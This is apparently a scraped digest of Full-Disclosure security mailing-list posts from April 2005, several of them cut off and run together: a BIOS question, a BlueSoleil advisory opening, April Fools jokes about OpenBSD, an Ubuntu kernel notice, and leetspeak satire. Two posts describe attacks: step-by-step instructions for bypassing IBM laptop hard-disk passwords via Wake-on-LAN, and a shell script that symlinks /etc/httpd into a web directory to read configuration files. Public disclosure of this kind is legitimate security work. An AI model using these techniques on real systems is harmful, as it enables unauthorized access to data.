Re: BIOS Hacking?

Gautam R. Singh wrote:

> Is there any way (software/program) to change the BootUp device order
> in the BIOS from the OS (Eg. Windows) itself?
> 
> While logged on to my Win2k I want to change my BIOS settings?

Boot-order settings are proprietary, so vary from BIOS vendor to BIOS 
vendor (and even possibly from version to version from the same 
vendor).  However, there is nothing special about what you want to do 
so long as the user running the utility (presumably supplied by your 
BIOS vendor _if_ such exists for your BIOS) has sufficiently high 
privileges.  Boot order (like all BIOS configuration options) is stored 
in CMOS and/or a fragment of Flash ROM used for EBCD so probably 
requires admin/system privs to alter (at least, to alter directly).

The laptop I'm writing this from has the capability to do what you ask, 
as do many others I've used.  This is achieved through vendor-supplied 
utilities in all cases I've looked at.  Such utilities seem much rarer 
(or at least, it is rare for them to be installed/supplied) on desktop 
boxes.  If you have a "cheap white box" style system you may well find 
a "mainboard utilities" disk amongst the various manuals and disks you 
probably never took out of the box, and usually this will include tools 
for altering the BIOS settings (and monitoring things like temperature, 
fan-speed, etc depending on your board) from inside the OS.  If you 
haven't such a disk, try searching around the websites of your 
mainboard and/or BIOS vendors.

Regards,

(Paper) Programming: The Heart of Web Security

Information and data transmission system security holds a place of
ever-growing importance in today's world. The expansion of the Web has
provided businesses with an ideal platform for introducing and
promoting their products and services.

The Web is accessible to all, being both easy to use and widespread.
It frequently supplies the responsiveness necessary in today's
business environment. The emergence of portal sites, which bring
together professionals in a given sector or industry, provides an
essential tool for decision- making and communication among
partners....

Full Article: http://www.exploitx.com/forum/azbb.php?1111283551

--

-- 
http://www.outwartips.net
http://www.exploitx.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

DMA[2005-0401a] - 'IVT BlueSoleil Directory Transversal'

gmane.comp.security.full-disclosure

DMA[2005-0401a] - 'IVT BlueSoleil Directory Transversal'
Author: Kevin Finisterre
Vendor: http://www.bluesoleil.com/products/index.asp, http://www.ivtcorporation.com/
Product: 'IVT BlueSoleil 1.4'
References: http://www.digitalmunition.com/DMA[2005-0103a].txt

Description: 
90% of the USB Bluetooth dongles you find on the market will come with drivers from 
Widcomm. Out of the 7 dongles I own only one does not use some flavor of Widcomm. My 
SMC Networks SMC-BT10 came with IVT BlueSoleil 1.4 software. 

BlueSoleil for Windows is a set of Bluetooth Application Profiles implemented on the
Windows platform. BlueSoleil is fully compliant with the Bluetooth SIG's latest 
specifications. It can enable PCs to form networks and exchange information wirelessly. 
It can also provide PC's a fast and reliable solution for effortless wireless connections 
to mobile phones, headsets, PDA's, Access Points, Printers, Digital Cameras, PC peripherals, 
etc. BlueSoleil supports more than ten Bluetooth chip-sets and different HCI interfaces 
which include USB, UART, PCMCIA and Compact Flash. 

My BlueSoleil install was performed on a Windows XP SP2 machine using the above mentioned 
SMC-BT10. I chose all program defaults during the install. Upon rebooting my machine the 
"Welcome to Bluetooth" screen was displayed and I was asked for a device name and type. I 
was told that my security level was set to 'Medium' and that other devices must provide a 
Bluetooth passkey before connecting with my computer. I was given the option to disable this 
security authentication by simply unchecking a box and clicking ok to continue. My PDA can 
be pickey about using a pass key so I did go with 'Low' security. The BlueSoleil website 
mentioned that 'some old dongles my not support some operations' when dealing with using the 
key functions. This behavior could obviously prompt other users to set security to 'Low'. 

openbsd 3.8 under GPL?

there are persistent rumors supported by check-ins on cvs.openbsd.org 
in private -GPL branch that openbsd 3.8 will be released under GPL.

analysts believe that theo accepting the fsf award for his contributions 
to GPL is just a part of the plot.

rumor says theo have said:
"definitely we can't build world without gcc. what the fuck is the 'G' in
gcc?
either we build a cc without 'G' so we can build world our way or we become
GPL."

--

-- 
where do you want bill gates to go today?

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: openbsd 3.8 under GPL?

I heard that Theo is actually hired by Red Hat and that the whole
OpenBSD project is gonna be bought by Red Hat.

On Apr 1, 2005 8:57 AM, Georgi Guninski <guninski <at> guninski.com> wrote:
> there are persistent rumors supported by check-ins on cvs.openbsd.org
> in private -GPL branch that openbsd 3.8 will be released under GPL.
> 
> analysts believe that theo accepting the fsf award for his contributions
> to GPL is just a part of the plot.
> 
> rumor says theo have said:
> "definitely we can't build world without gcc. what the fuck is the 'G' in
> gcc?
> either we build a cc without 'G' so we can build world our way or we become
> GPL."
> 
> --
> where do you want bill gates to go today?
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

IBM Laptop harddisk password bypass

A feature badly configured or a bug on most of the IBM laptops T model and X 
model allows to access to the hard-disk without entering the password by 
using the WOL feature.
(Tested on T40, T41, T42, X24, X30, X40 )

By default : WOL feature is on
By default : Network boot order contains CD-ROM
Most people enter the same bios and hard-disk password ( as 2 diffenrent 
passwords is too much for most users )

Step-by-step
############

- Plug-ins the power supply in the laptop
- Insert a bootable CDrom (not a DOS one, but for example a WinPE or a WINXP 
made with Bart )
- Plug-In the network
- OpenUp the laptop without powering it up.

- Send from another computer a WOL packet ( my tool for Win32 
http://frank.bussink.ch/download/wol.zip)  with the mac address of the 
laptop
- don't touch a key
- after 90 seconds waiting the laptop will boot on the CD-ROM
- so if the hard-disk is not encrypted you can now access the hard-disk data 
!

For Security Administrators :
##########################
To secure the laptops, uncheck the WOL feature in the BIOS or if you need 

[USN-103-1] Linux kernel vulnerabilities

===========================================================
Ubuntu Security Notice USN-103-1	     April 01, 2005
linux-source-2.6.8.1 vulnerabilities
CAN-2005-0400, CAN-2005-0749, CAN-2005-0750, CAN-2005-0815,
CAN-2005-0839
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

linux-image-2.6.8.1-5-386
linux-image-2.6.8.1-5-686
linux-image-2.6.8.1-5-686-smp
linux-image-2.6.8.1-5-amd64-generic
linux-image-2.6.8.1-5-amd64-k8
linux-image-2.6.8.1-5-amd64-k8-smp
linux-image-2.6.8.1-5-amd64-xeon
linux-image-2.6.8.1-5-k7
linux-image-2.6.8.1-5-k7-smp
linux-image-2.6.8.1-5-power3
linux-image-2.6.8.1-5-power3-smp
linux-image-2.6.8.1-5-power4
linux-image-2.6.8.1-5-power4-smp
linux-image-2.6.8.1-5-powerpc
linux-image-2.6.8.1-5-powerpc-smp
linux-patch-debian-2.6.8.1

[hr0n073rr0r15m - 7h3 J4ck50ff 7r14l.

------------------------------------------------
53cur17y 1ndu57ry [0nc3rn3d-p3r50n5 Pr353n7
[hr0n073rr0r15m - 7h3 J4ck50ff 7r14l.
------------------------------------------------

Gr3371ng5 f3ll0w hum4n5 w3lc0m3 70 7h3 y34r 3337,

0n 4 qu1ck pr3-4dv150ry n073 (4nd 7h1nk1ng 4b0u7 7h053 0f u5 wh0 d0n'7 f4ll 
1n70 7h3 c473g0ry 0f Hum4n): Wh47 w45 up w17h G0ld5731n 574lk1ng 7h3 57r3375,
4nd n0 d0ub7 7h3 m4l3 y0u7h, 0f B3rl1n 1n D3c3mb3r? 51[ 4g3n75 1n 7h3 f13ld
r3p0r7 h3 w45 533n r4mbl1ng 70 h1m53lf fr0m 4 p0d1um wh1l57 7h053 1n 7h3 
4ud13nc3 (w4171ng f0r B0b0 7h3 H4x0r cl0wn) w3r3 w4171ng 70 533 1f
3v3n7 53cur17y
w0uld 7r4nqu1l153 7h3 r4b1d b3457.

1n 07h3r n3w5:

17 h45 b33n br0ugh7 70 0ur 4773n710n 7h47 5k1ppy h45 f4ll3n d0wn 7h3 w3ll 
4nd L177l3 71mmy d035n'7 g1v3 4 5h17 45 h3 h45 4 n3w M1n1-M4c wh1ch 15 50 
57r1pp3d d0wn 7h47 17 c0m35 w17h0u7 4ny c0mp0n3n75 70 k33p c057 l0w, unl355
y0u 4r3 4 m3mb3r 0f 7h3 publ1c wh0 74lk5 4b0u7 17.

huh? cr4p 7h47 15n'7 m34n7 70 b3 r3l3453d f0r 12 m0n7h5?
50m30n3 c0uld h4v3 70ld m3! wh47 w17h 7h3 3x-3N 35 4Y (0bfuck473d 70 4nn0y 7h3m)
3mpl0y335 h4v1ng Ru5514n5 wr171ng plug1n5 f0r 7h31r 5h177y c0d3.

H44444ll000 D4v3.

574y1ng w17h 3N 35 4Y l1nk5 (0r lynx y0ur ch01c3) 
H45 4ny0n3 b33n n071c1ng h0w l0ckh33d m4r71n 15 51ph0n1ng H0glund5 1ll g07 ++'5 

Re: openbsd 3.8 under GPL?

> I heard that Theo is actually hired by Red Hat and that the whole
> OpenBSD project is gonna be bought by Red Hat.

It's april 1 or Theo and RMS are actually brothers. 

--

-- 
                                                    Eduardo Tongson     
                                                    <pornadmin.net/~tongson>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Phun With Apache

#!/bin/sh
## Apache follows symbolic links referenced by public_html!
## Even when SymLinksifOwnerMatch is set and FollowSymLinks is not!
## A super-easy way to gain read access on files owned by the apache user!
ln -s /etc/httpd ~/public_html
lynx http://localhost/~duper/passwd

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/